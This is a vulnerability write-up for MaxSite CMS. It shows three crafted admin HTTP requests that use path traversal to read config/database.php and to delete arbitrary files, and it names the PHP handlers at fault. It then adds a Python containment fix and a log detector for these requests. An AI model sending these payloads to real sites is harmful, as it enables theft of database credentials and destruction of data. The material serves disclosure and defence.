MaxSite CMS is a content management system for websites, blogs, corporate sites, business-card sites, landing pages and similar projects. It is aimed at ordinary users, freelancers and web studios. MaxSite CMS offers a rich feature set and fast performance. Country of origin: Ukraine.
Arbitrary file read
Crafted request:
POST /ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfZmlsZXMvbG9hZC1maWxlLWFqYXgucGhw HTTP/1.1
Host: maxsitecms.test
Content-Length: 45
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://maxsitecms.test
Referer: http://maxsitecms.test/admin/editor_files
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: admin-menu=%7B%220%22%3A1%2C%221%22%3A1%2C%222%22%3A1%7D; maxsitecms.test-admin-files1=%7B%220%22%3A0%7D; maxsitecms.test-admin-files-e1=%7B%220%22%3A1%7D; ci_session=a%3A19%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%223f85a588b8a9337f905e519cebe411c1%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A114%3A%22Mozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F85.0.4183.83%20Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1699602586%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A10%3A%22userlogged%22%3Bs%3A1%3A%221%22%3Bs%3A18%3A%22last_activity_prev%22%3Bi%3A1699602579%3Bs%3A7%3A%22comuser%22%3Bi%3A0%3Bs%3A8%3A%22users_id%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22users_nik%22%3Bs%3A5%3A%22admin%22%3Bs%3A11%3A%22users_login%22%3Bs%3A92%3A%22MSO-8uC7s6rPzCMxfnQASrFySO5MxZMkKIVD2syvk8tXIIP04PzGd0gveLS5tQoAOGap8r5kVmVB3Xttpm2j7rzgrQ%3D%3D%22%3Bs%3A14%3A%22users_password%22%3Bs%3A132%3A%22MSO-Tm8dd0dwpsR85Op2Jdgl%2B7xFK7Mru8hXfUW8NC%2BDQquZvi9snvaNcYbOX%2FlIl7Cr%2BBDAbPhjL7DovYaa2Mu2SFxdxzeq1uBvqiLbwzCe338pQ5rk1zOZSdzSnsrjyf5T%22%3Bs%3A15%3A%22users_groups_id%22%3Bs%3A1%3A%221%22%3Bs%3A16%3A%22users_last_visit%22%3Bs%3A19%3A%222023-11-10%2015%3A29%3A07%22%3Bs%3A17%3A%22users_show_smiles%22%3Bs%3A1%3A%221%22%3Bs%3A15%3A%22users_time_zone%22%3Bs%3A4%3A%227200%22%3Bs%3A14%3A%22users_language%22%3Bs%3A2%3A%22ru%22%3Bs%3A16%3A%22users_avatar_url%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22users_email%22%3Bs%3A8%3A%221%40qq.com%22%3B%7D7501282536167f97bfe43d1b7d27ac97b58c3260
Connection: close
file=Li4vLi4vLi4vY29uZmlnL2RhdGFiYXNlLnBocA==
This reads the file ../../../config/database.php.

Both the route and the value of the parameter are base64-encoded.
application/maxsite/admin/plugins/editor_files/load-file-ajax.php

The file parameter is taken as received, with no further processing, and concatenated into $file; the file is then read with file_get_contents and its contents are returned.
On the front end, the request and response carrying the file contents can be captured at this point.

Arbitrary file deletion
Crafted request:
POST /ajax/YWRtaW4vcGx1Z2lucy9hZG1pbl9wYWdlL2FsbC1maWxlcy11cGRhdGUtYWpheC5waHA= HTTP/1.1
Host: maxsitecms.test
Content-Length: 48
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://maxsitecms.test
Referer: http://maxsitecms.test/admin/editor_files
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: admin-menu=%7B%220%22%3A1%2C%221%22%3A1%2C%222%22%3A1%7D; maxsitecms.test-admin-files1=%7B%220%22%3A0%7D; maxsitecms.test-admin-files-e1=%7B%220%22%3A1%7D; ci_session=a%3A19%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%223f85a588b8a9337f905e519cebe411c1%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A114%3A%22Mozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F85.0.4183.83%20Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1699602586%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A10%3A%22userlogged%22%3Bs%3A1%3A%221%22%3Bs%3A18%3A%22last_activity_prev%22%3Bi%3A1699602579%3Bs%3A7%3A%22comuser%22%3Bi%3A0%3Bs%3A8%3A%22users_id%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22users_nik%22%3Bs%3A5%3A%22admin%22%3Bs%3A11%3A%22users_login%22%3Bs%3A92%3A%22MSO-8uC7s6rPzCMxfnQASrFySO5MxZMkKIVD2syvk8tXIIP04PzGd0gveLS5tQoAOGap8r5kVmVB3Xttpm2j7rzgrQ%3D%3D%22%3Bs%3A14%3A%22users_password%22%3Bs%3A132%3A%22MSO-Tm8dd0dwpsR85Op2Jdgl%2B7xFK7Mru8hXfUW8NC%2BDQquZvi9snvaNcYbOX%2FlIl7Cr%2BBDAbPhjL7DovYaa2Mu2SFxdxzeq1uBvqiLbwzCe338pQ5rk1zOZSdzSnsrjyf5T%22%3Bs%3A15%3A%22users_groups_id%22%3Bs%3A1%3A%221%22%3Bs%3A16%3A%22users_last_visit%22%3Bs%3A19%3A%222023-11-10%2015%3A29%3A07%22%3Bs%3A17%3A%22users_show_smiles%22%3Bs%3A1%3A%221%22%3Bs%3A15%3A%22users_time_zone%22%3Bs%3A4%3A%227200%22%3Bs%3A14%3A%22users_language%22%3Bs%3A2%3A%22ru%22%3Bs%3A16%3A%22users_avatar_url%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22users_email%22%3Bs%3A8%3A%221%40qq.com%22%3B%7D7501282536167f97bfe43d1b7d27ac97b58c3260
Connection: close
dir=../../../../../../../../../&deletefile=1.txt
This deletes the file ../../../../../../../../../1.txt.

The route is base64-encoded.
application/maxsite/admin/plugins/admin_page/all-files-update-ajax.php

The dir and deletefile parameters are taken as received, with no further processing, and concatenated into $file; file_exists is then used to check that the file exists, after which unlink is called to delete it.
Arbitrary file deletion
Crafted request:
POST /admin/files/e HTTP/1.1
Host: maxsitecms.test
Content-Length: 136
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://maxsitecms.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://maxsitecms.test/admin/files/e
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: maxsitecms.test-admin-files1=%7B%220%22%3A0%7D; maxsitecms.test-admin-files-e1=%7B%220%22%3A1%7D; admin-menu=%7B%220%22%3A1%2C%221%22%3A1%2C%222%22%3A1%2C%223%22%3A1%7D; mso-tabs_widget_000=0; ci_session=a%3A19%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%223f85a588b8a9337f905e519cebe411c1%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A114%3A%22Mozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F85.0.4183.83%20Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1699605734%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A10%3A%22userlogged%22%3Bs%3A1%3A%221%22%3Bs%3A18%3A%22last_activity_prev%22%3Bi%3A1699605718%3Bs%3A7%3A%22comuser%22%3Bi%3A0%3Bs%3A8%3A%22users_id%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22users_nik%22%3Bs%3A5%3A%22admin%22%3Bs%3A11%3A%22users_login%22%3Bs%3A92%3A%22MSO-8uC7s6rPzCMxfnQASrFySO5MxZMkKIVD2syvk8tXIIP04PzGd0gveLS5tQoAOGap8r5kVmVB3Xttpm2j7rzgrQ%3D%3D%22%3Bs%3A14%3A%22users_password%22%3Bs%3A132%3A%22MSO-Tm8dd0dwpsR85Op2Jdgl%2B7xFK7Mru8hXfUW8NC%2BDQquZvi9snvaNcYbOX%2FlIl7Cr%2BBDAbPhjL7DovYaa2Mu2SFxdxzeq1uBvqiLbwzCe338pQ5rk1zOZSdzSnsrjyf5T%22%3Bs%3A15%3A%22users_groups_id%22%3Bs%3A1%3A%221%22%3Bs%3A16%3A%22users_last_visit%22%3Bs%3A19%3A%222023-11-10%2015%3A29%3A07%22%3Bs%3A17%3A%22users_show_smiles%22%3Bs%3A1%3A%221%22%3Bs%3A15%3A%22users_time_zone%22%3Bs%3A4%3A%227200%22%3Bs%3A14%3A%22users_language%22%3Bs%3A2%3A%22ru%22%3Bs%3A16%3A%22users_avatar_url%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22users_email%22%3Bs%3A8%3A%221%40qq.com%22%3B%7D5e5de5418d8060eaf150a1e9166713e3736711b6
Connection: close
f_session_id=3f85a588b8a9337f905e519cebe411c1&f_check_files%5B%5D=../../../../../../../../../../../../../../../../1.txt&f_delete_submit=
This deletes the file ../../../../../../../../../1.txt.

application/maxsite/admin/plugins/admin_files/admin.php

The f_check_files parameter is not processed in any way; it is extracted into $file and unlink is finally called to delete the file.
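All three handlers share the same root cause: a user-controlled path fragment is concatenated into $file and handed to file_get_contents or unlink without ever checking where the resolved path ends up. The example below is added here and is not MaxSite's code; it is written in Python rather than the CMS's PHP so that the check can be run stand-alone, and the directory layout, the uploads base directory, and the function names contain, load_file and delete_file are all assumptions made for the demonstration. It resolves the requested path with realpath and refuses anything that does not stay inside the allowed base directory, and it is exercised with the exact values from the three requests above (the base64 file parameter, the dir/deletefile pair, and the f_check_files[] value) plus a legitimate file name.

```python
import base64
import os
import tempfile
from typing import Optional

# Constructed sandbox (not the CMS's real layout): a base directory the
# handler is allowed to touch, plus a "secret" file outside it that must
# stay unreachable whatever path the client sends.
ROOT = tempfile.mkdtemp(prefix="maxsite-demo-")
UPLOAD_DIR = os.path.join(ROOT, "uploads")
os.makedirs(UPLOAD_DIR)
with open(os.path.join(UPLOAD_DIR, "notes.txt"), "w") as fh:
    fh.write("public content\n")
os.makedirs(os.path.join(ROOT, "config"))
with open(os.path.join(ROOT, "config", "database.php"), "w") as fh:
    fh.write("<?php // constructed stand-in for a secret config\n")


def contain(base_dir: str, user_path: str) -> Optional[str]:
    """Resolve user_path relative to base_dir and return the absolute path,
    or None if the resolved path would leave base_dir.

    realpath() collapses '..' segments and follows symlinks, so the decision
    is made on the path the filesystem would actually open, not on the
    string the client sent. commonpath() is path-aware, so /x/uploads-evil
    is correctly treated as outside /x/uploads.
    """
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def load_file(user_path: str) -> Optional[str]:
    """Hardened stand-in for the load-file handler (assumed name): the
    caller still base64-decodes the parameter, but the decoded path is
    contained before anything is read."""
    path = contain(UPLOAD_DIR, user_path)
    if path is None or not os.path.isfile(path):
        return None
    with open(path) as fh:
        return fh.read()


def delete_file(directory: str, name: str) -> bool:
    """Hardened stand-in for both delete handlers (assumed name): the file
    name must be a bare name, the joined path must stay inside the base
    directory, and on any failure nothing is touched."""
    if os.path.basename(name) != name:          # name carries a directory part
        return False
    path = contain(UPLOAD_DIR, os.path.join(directory, name))
    if path is None or not os.path.isfile(path):
        return False
    os.unlink(path)
    return True


if __name__ == "__main__":
    # The file parameter from the first request, decoded as the handler does.
    traversal = base64.b64decode("Li4vLi4vLi4vY29uZmlnL2RhdGFiYXNlLnBocA==").decode()
    print("legit read   :", load_file("notes.txt") is not None)
    print("traversal    :", load_file(traversal))
    print("dir/deletefile:", delete_file("../../../../../../../../../", "1.txt"))
```

The number of `../` segments in the page's payloads reflects where the vulnerable scripts sit in the real install; the containment check does not depend on that depth, since any path whose realpath is not under the base directory is rejected before the filesystem call.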
Why do some routes need to be base64-encoded while others do not? The answer is in this part of the code:
application/views/ajax.php

A request is dispatched through this route only when the decoded file name ends in -ajax.php.
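Because the /ajax/ route and the file parameter travel base64-encoded, a plain string match for "../" in an access log misses the first request entirely. The detector below is an added example, not part of the original write-up or of MaxSite: it decodes the route the way ajax.php does (keeping only decoded names that end in -ajax.php, as explained above), base64-decodes parameter values that decode cleanly, and flags any value containing a ".." path segment. The log lines are constructed for the demonstration and carry the request body as an extra quoted field, as a reverse-proxy or WAF body-logging rule might emit it; that layout, the IP addresses, the timestamps and the benign c3R5bGUuY3Nz (style.css) value are all assumptions.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote

# Constructed sample log (combined format plus a trailing quoted body field).
# The three suspicious lines reuse the routes and bodies from the write-up;
# the last two lines are benign traffic added for contrast.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Nov/2023:15:29:46 +0200] "POST /ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfZmlsZXMvbG9hZC1maWxlLWFqYXgucGhw HTTP/1.1" 200 812 "file=Li4vLi4vLi4vY29uZmlnL2RhdGFiYXNlLnBocA=="
203.0.113.5 - - [10/Nov/2023:15:30:02 +0200] "POST /ajax/YWRtaW4vcGx1Z2lucy9hZG1pbl9wYWdlL2FsbC1maWxlcy11cGRhdGUtYWpheC5waHA= HTTP/1.1" 200 16 "dir=../../../../../../../../../&deletefile=1.txt"
203.0.113.5 - - [10/Nov/2023:15:35:34 +0200] "POST /admin/files/e HTTP/1.1" 302 0 "f_session_id=3f85a588b8a9337f905e519cebe411c1&f_check_files%5B%5D=../../../../../../../../../../../../../../../../1.txt&f_delete_submit="
198.51.100.7 - - [10/Nov/2023:15:36:10 +0200] "POST /ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfZmlsZXMvbG9hZC1maWxlLWFqYXgucGhw HTTP/1.1" 200 301 "file=c3R5bGUuY3Nz"
198.51.100.7 - - [10/Nov/2023:15:36:40 +0200] "GET /page/about HTTP/1.1" 200 5120 "-"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d+) \S+ "(?P<body>[^"]*)"$'
)

# A '..' segment delimited by either separator (or the string ends).
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')


def b64_text(value: str) -> Optional[str]:
    """Strictly decode base64 to text; None if the value is not base64."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def has_traversal(value: str) -> bool:
    # parse_qs already URL-decoded once; decode again to catch %252e style
    # double encoding before looking for a '..' segment.
    return bool(TRAVERSAL_RE.search(unquote(value)))


def ajax_script(path: str) -> Optional[str]:
    """Mirror the /ajax/<base64> dispatch rule: return the decoded script
    name only when it would actually be routed (ends in -ajax.php)."""
    if not path.startswith("/ajax/"):
        return None
    script = b64_text(path[len("/ajax/"):])
    if script is None or not script.endswith("-ajax.php"):
        return None
    return script


def inspect(line: str) -> Optional[Dict[str, object]]:
    """Return a finding for one log line, or None when nothing is suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return None
    body = "" if m.group("body") == "-" else m.group("body")
    hits = set()
    for key, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            candidates = [value]
            decoded = b64_text(value)          # the file= parameter is base64
            if decoded is not None:
                candidates.append(decoded)
            if any(has_traversal(c) for c in candidates):
                hits.add(key)
    if not hits:
        return None
    return {
        "ip": m.group("ip"),
        "path": m.group("path"),
        "script": ajax_script(m.group("path")),
        "params": sorted(hits),
    }


def scan(log_text: str) -> List[Dict[str, object]]:
    return [f for f in (inspect(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Decoding the route also gives an analyst the real script name (load-file-ajax.php, all-files-update-ajax.php) to search for, which the raw base64 path in the log hides; the /admin/files/e request has no encoded route, so its "script" field stays None and the hit comes from the f_check_files[] value alone.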